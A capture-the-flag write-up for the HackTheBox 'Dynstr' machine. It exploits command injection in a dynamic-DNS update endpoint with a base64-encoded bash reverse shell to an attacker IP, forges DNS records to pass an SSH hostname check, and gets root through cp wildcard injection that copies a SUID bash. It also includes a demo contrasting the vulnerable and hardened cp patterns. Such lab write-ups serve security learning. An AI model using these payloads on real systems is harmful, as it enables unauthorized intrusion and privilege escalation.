HackTheBox-Dynstr

Hello everyone, I hope you are doing well. In this post I will be sharing my writeup for the HTB Dynstr machine, which was rated medium difficulty. Starting with the reconnaissance phase, we discovered three open ports (SSH, DNS and HTTP), of which only HTTP was interesting for us. On the home page we found credentials that are used for authenticating when making a request to /nic/, which we can find through gobuster or any other fuzzing tool. We can get command injection in the hostname parameter and get a reverse shell. From the machine we can get the private SSH key of a user from some debug output; in order to log in through SSH we needed dynamic DNS, because the key was only allowed to connect from a specific hostname. Since SSH was using DNS we needed to add A and PTR records in order to log in, and after that we could see that the user can run a script as root which uses the cp command with a wildcard (*), so we can abuse this and get root.

NMAP

nmap -p- -sC -sV --min-rate 5000 10.129.6.34
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Dyna DNS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

On the webserver we can see an HTML page referring to Dyna DNS or “Dynamic DNS”.

Scrolling down a bit we can see a few domain names plus credentials.

At the end we’ll find the domain name dyna.htb.

So let’s add those domain names to the /etc/hosts file.

All those domains lead to the same page.

Maybe we’ll need to fuzz for subdomains, so let’s start with dyna.htb.

We may need to filter out the responses with 10909 characters.

I found nothing, so I tried checking for any exploits for ISC BIND 9.16.1; it had a buffer overflow but there was no public exploit for it.

Let’s just fuzz for files and directories using gobuster.

This kept giving me errors, so I increased the threads to 60 and it worked.

Going to nic, it doesn't show anything.

Fuzzing further for files, we find update.

Here we get badauth. Now remember we found credentials on the home page, so let’s use them here; we can authenticate with them through curl.

And now we get nochg our_vpn_ip.

Googling nochg:

This led to the No-IP dynamic DNS API, so looking at its response codes:

We can see that nochg is telling us that we haven’t supplied a hostname to update, so let’s dig deeper into how to update a DNS record.

https://www.noip.com/integrate/request

So we can update a DNS record; however, the hostname needs to be valid, and going back to the web page where we found potential domain names, those are valid:

dnsalias.htb
dynamicdns.htb
no-ip.htb

I intercepted the request with Burp Suite, added the header Authorization: Basic ZHluYWRuczpzbmRhbnlk, where the base64-encoded text holds the username and password, and tried to update either one of the domain names.

But I kept getting an error, so I added a random subdomain, arz.dnsalias.htb.

This response tells us that the hostname is updated, but we can’t do anything with that alone, so I tried command injection here.

Following this payload list, I was able to confirm command injection:

https://github.com/payloadbox/command-injection-payload-list

Now, to get a shell the payload would need to be URL encoded, but that is a pain to do, so I will first base64 encode the bash reverse shell, pipe it through base64 -d and then pipe it to bash.

$(echo+L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjU3LzIyMjIgMD4mMSc=+|+base64+-d+|+bash)

Going into bindmgr's home directory I found some files, and one of them was a script file (script records every command you type on the terminal), so on looking into the script file we'll find something interesting.

Let’s just put this in a bash script where we echo the SSH key with -e, which enables the use of escape characters, but this didn't work.

It turns out there were spaces between the lines, so I had to remove them manually, and then I just used python3 to print the key.

But I wasn’t able to log in with the id_rsa key because there’s a hostname restriction in the authorized_keys file.

Looking at the source code of the update file we can see nsupdate being used with the key /etc/bind/ddns.key.

I tried to add a domain name, but it failed.

Eventually I figured out that we needed to use a different key, so going to /etc/bind:

There’s infra.key, which makes sense as we are adding a DNS record for the infra domain.

If we do an nslookup on this domain we’ll get a response, which means the record has been added and points to our IP.

But we still won’t be able to log in through SSH: use of DNS is enabled, and sshd performs a reverse DNS lookup, so while the domain name resolves to our IP, the IP address doesn't resolve back to the domain name. We need to add a PTR record for this purpose.

This is what I followed in order to add a PTR record; I also deleted the A record I had added.

https://superuser.com/questions/977132/when-using-nsupdate-to-update-both-a-and-ptr-records-why-do-i-get-update-faile

Here the space is necessary after adding the A record. Now let's try to SSH into the machine.

Doing sudo -l we can see that this user can run /usr/local/bin/bindmgr.sh as ALL, meaning we can run it as root.

Here it’s checking for a .version file, and it's using the wildcard * to copy everything.

We can see that .version is in the /etc/ folder, so this is where the script will operate.

What we can do is create a .version file and put 42 in it, as that's what the original file contains.

Now if we look at that script we can see that .version is checked first: the script compares whether the contents of that file are less than or equal to the .version file in /etc/bind/named.bindmgr, which is why we are going to keep it at 42. Next, cp is used like this: cp .version *. It's going to copy the .version file from the current directory plus everything else, so here we can do wildcard injection.

So first I’ll copy /bin/bash to the current directory and make it a SUID binary.

Now here the wildcard injection takes place: we abuse it by creating a file named --preserve=mode. While copying, cp will then retain the attributes of the files in this directory; bash has SUID, so it's going to retain that attribute and copy it to /etc/bind/named.bindmgr, which is owned by root.
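The cp pattern described above, reproduced as an added example (not code from the writeup or from the box) with a hardened form beside it; it stages constructed files in a temporary directory and sets the setuid bit only on a file the current user owns, so nothing here grants privilege:

```shell
#!/bin/sh
# Added example, not code from the writeup: the "cp .version *" pattern from
# bindmgr.sh reproduced in a throwaway directory next to a hardened form.
# Every file below is constructed for the demo.

# Stage a directory like the one the writeup builds: a .version file, a
# setuid binary and a file literally named --preserve=mode.
make_stage() {
    stage=$(mktemp -d)
    echo 42 > "$stage/.version"
    printf '#!/bin/sh\necho hi\n' > "$stage/tool"
    chmod 4755 "$stage/tool"            # setuid on our own file, harmless
    : > "$stage/--preserve=mode"        # filename that parses as a cp option
    printf '%s\n' "$stage"
}

# Vulnerable pattern (as in the script on the box): the unquoted glob expands
# to "--preserve=mode tool" and cp honours the first word as an option, so
# the setuid bit is carried into the destination.
copy_vulnerable() {   # $1 = stage dir, $2 = destination dir
    (cd "$1" && cp .version * "$2/")
}

# Hardened pattern: "--" ends option parsing and "./*" anchors every match so
# no expansion can begin with a dash. Without --preserve=mode, cp creates the
# copy with the setuid/setgid/sticky bits cleared.
copy_hardened() {
    (cd "$1" && cp -- .version ./* "$2/")
}

# Runs one copy function and reports whether the setuid bit survived on the
# copied binary: returns 0 if it did, 1 otherwise.
setuid_survives() {   # $1 = name of a copy function above
    src=$(make_stage)
    dst=$(mktemp -d)
    "$1" "$src" "$dst"
    survived=1
    [ -u "$dst/tool" ] && survived=0
    rm -rf "$src" "$dst"
    return $survived
}

# Stand-alone demo output.
setuid_survives copy_vulnerable && echo "cp .version *      : setuid kept (vulnerable)"
setuid_survives copy_hardened   || echo "cp -- .version ./* : setuid dropped (hardened)"
```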

Now just run the script with sudo.

If we go to /etc/bind/named.bindmgr we'll see that it now holds bash as a SUID binary.

And we have rooted this machine !!!
